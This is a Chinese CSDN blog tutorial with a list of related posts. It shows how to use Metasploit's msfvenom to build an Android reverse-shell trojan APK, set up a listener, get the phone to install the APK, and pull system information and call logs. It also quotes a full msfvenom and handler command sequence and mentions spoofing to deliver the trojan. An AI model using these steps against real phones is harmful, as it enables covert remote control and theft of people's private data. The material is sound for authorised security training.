MSF渗透测试android手机

最新推荐文章于 2024-05-13 11:19:20 发布
最新推荐文章于 2024-05-13 11:19:20 发布
阅读量4.9k 收藏 56
点赞数 9
分类专栏: Kali Linux 文章标签: android MSF 信息安全 渗透测试 kali Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/125267558
版权

今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透测试android手机。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、Android木马生成

在Kali Linux设备上,我们先生成Android的木马,执行命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.83.199 LPORT=4444 R > exp.apk

即可生成名为exp.apk的木马程序,该命令的执行过程如下所示:
在这里插入图片描述

二、Android木马安装与监听

首先,我们在Kali Linux系统上开启监听功能。还是选择使用exploit/multi/handler模块,选择android/meterpreter/reverse_tcp作为payload,并设置LHOST参数为Kali Linux的IP地址,如下所示:
在这里插入图片描述
之后,我们执行run,开启监听功能。
我们把生成的木马放到/var/www/html/目录中,并开启apache2服务,以方便我们在Android目标机上下载该木马文件。
我们可以将Kali Linux设备选择桥接模式,并与一台Android手机连接到一个无线局域网上,然后就可以通过Android访问并下载我们生成的木马文件了,Android设备下载木马文件如下所示:
在这里插入图片描述
下载下来后,我们可以点击安装(注意:我们的木马毕竟没有经过加壳等处理,因此有可能无法通过手机自带的安全软件拦截,这也是正常的现象),结果如下所示:
在这里插入图片描述

三、效果检验

我们点击执行该程序,然后就可以在Kali Linux上看到已经建立了Android到Kali Linux上的连接了,如下所示:
在这里插入图片描述
我们可以执行一些命令,获取Android手机的一些信息,如下所示:
在这里插入图片描述
在上图中,我们执行并获取了Android手机的系统信息和通过记录信息,一共获取到760条通话记录,通话记录(部分)如下所示:
在这里插入图片描述
从以上可知,我们使用MSF渗透测试Android手机成功!
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
  • 9
    点赞
  • 56
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 16
    评论
专栏目录
Kali Linux利用MSF入侵安卓手机(零基础版超详细)
m0_74914256的博客
05-05 1万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的通讯录,实时获取对方手机GPS定位
kali完成一次android渗透测试
weixin_51715176的博客
05-05 2555
一次简单的渗透测试
MSF入侵安卓手机【附源码笔记】
最新发布
2301_77162959的博客
05-13 522
MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径。
MSF模拟渗透测试之攻击Android
lza20001103的博客
04-09 6921
MSF渗透测试系列之攻击Android
利用MSF攻击Android
qq_45746768的博客
07-08 3771
利用Metasploit攻击Android
2024最受欢迎的20款渗透测试工具
Python_0011的博客
01-04 1231
适用于 Android 的多合一 WiFi 破解工具。项目地址:github.com/chrisk44/Hij适用于 Android 5+ 的 Aircrack,Airodump,Aireplay,MDK3 和 Reaver GUI 应用程序。(需要 root)特征查看附近 wifi 及设备列表获取接入点信息取消他人的连接捕获数据包等等。
MSF入侵安卓手机
2201_75719295的博客
05-18 5248
里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试。
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架...下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
msf 渗透测试
06-05
msf渗透
移动端渗透测试框架MSF
09-24
移动安全框架MSF(Mobile Security Framework - MobSF)是一个全面的、开源的渗透测试和安全分析平台,专门针对移动应用,如Android和iOS应用程序。它为安全专家提供了自动化静态和动态分析工具,帮助他们在开发周期...
69-69.渗透测试-Linux安装MSF.mp4
05-10
69-69.渗透测试-Linux安装MSF.mp4
卡利渗透旧安卓
Aeroguita_Ex的博客
05-13 969
我们把apk脱到android虚拟机中安装,这里我改了一下名字,想装得像一点还可以给他加工图标,或者用原本功能正常的apk用msf和520apkhook加木马(亲测可行,推荐小一点的什么连点器之类,相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标,点击后没有任何app界面。注入后的app在安装时,手机管家不会有任何安全提示,原始msf生成的app程序,安装时手机管家会有安全警示。1.最好的办法就是不安装不认识的软件。
msf对小米11进行安全渗透
SwBack的博客
08-24 5109
MSF渗透测试之小米11
你知道的黑客工具都有哪些(推荐网络黑客的20种工具)
yy1715713348的博客
06-21 1071
有效负载是在调用服务器脚本时生成的,它仅利用 nslookup 来执行查询并向服务器查询新命令,然后服务器在端口 53 上侦听传入的通信,一旦在目标计算机上执行了有效负载,服务器就会生成一个交互式外壳。建立通道后,如果输入了新命令,则有效负载将连续向服务器查询命令,它将执行该命令并将结果返回给服务器。
黑客养成计划-熟悉MSF并拿下一部android
小司机的奥拓
05-06 539
本文仅用于学习和技术探讨,不作为任何恶意行为能力传播,本质上,只是想让大家学习了解MSF。Metasploit Framework (MSF)是目前所能接触到的软件渗透测试工具中最知名的工具,包括数千个工具和模块,可用于探索和利用漏洞、执行调查、测试和工具/有效负载创建等,对攻击者、防御者来说都是爱恨交加。三个版本.
安卓手机搭建kali环境,手机变成便携式渗透神器
Python_0011的博客
04-12 4671
下面的步骤跟上边的差不多就不做赘述了(注意安装桌面是在kali下安装,就是在./start-kali.sh命令之后在输入安装命令)当安装过程中出现以下界面时,证明你安装失败了,我的做法是在安装一遍,具体问题不知,猜测可能是网络问题造成的.kali是著名的黑客专用系统,一般都是直接装在物理机或者虚拟机上,我们可以尝试把kali安装在手机上,把手机打造成一个便携式渗透神器。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。工欲善其事必先利其器。
APP安卓渗透测试四大步骤
网站安全专家
07-15 2448
在开始APP安卓端渗透测试时,根据需要制定步骤,并向委托方详细说明需要使用的工具、方法等。具体操作时,会把渗透测试分成三个部分和阶段,不同的角度使区别的方法有所不同,例如在理论上把渗透测试分为准备阶段、渗透测试阶段、整体对比与评估阶段,而在技术操作上分为探测、攻击渗透、目标权限获取三个阶段。 在具体的实施过程中要考虑以下因素:委托方规模、网络分布、系统组成。本课程的测试目的、范围、时间、地点、人员信息、风险规避的方法、整体计划、过程等都有详细的说明。整个测试由信息采集检测、漏洞扫描和渗透攻击三个部分组
使用kalimsf渗透安卓手机
r7rrtyrytr的博客
01-30 3559
#1# 生成安卓手机木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=(本机ip) LPORT=4444 R > /home/kali/Desktop/111.apk apk生成后会保存在桌面上。 #2# 加载模块 use exploit/multi/handler #3# 选择Payload set payload android/meterpreter/reverse_tcp #4# 查看参数并设置 show o
网络安全-渗透完整笔记
03-27
网络渗透是一种攻击手段,也是一种综合的高级攻击技术,也被成为“渗透测试” [3]。渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞 [3]。换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。渗透测试的目的是为了检测企业的安全防范中还有什么漏洞 [1]。渗透测试可以分为黑盒、白盒和灰盒三种,其中在项目中大多数以黑盒和白盒为主 [1]。黑盒测试是模仿真实环境下的黑客攻击,攻击者对项目从一无所知到逐步渗透,需要攻击者有较高的技术水平,时间消耗的也可能比较长,攻击者只要找到该企业的一个漏洞并以低成本高效率的拿下项目的权限,黑盒测试可以检测项目团队的对入侵的防范能力和被入侵时间的应对能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值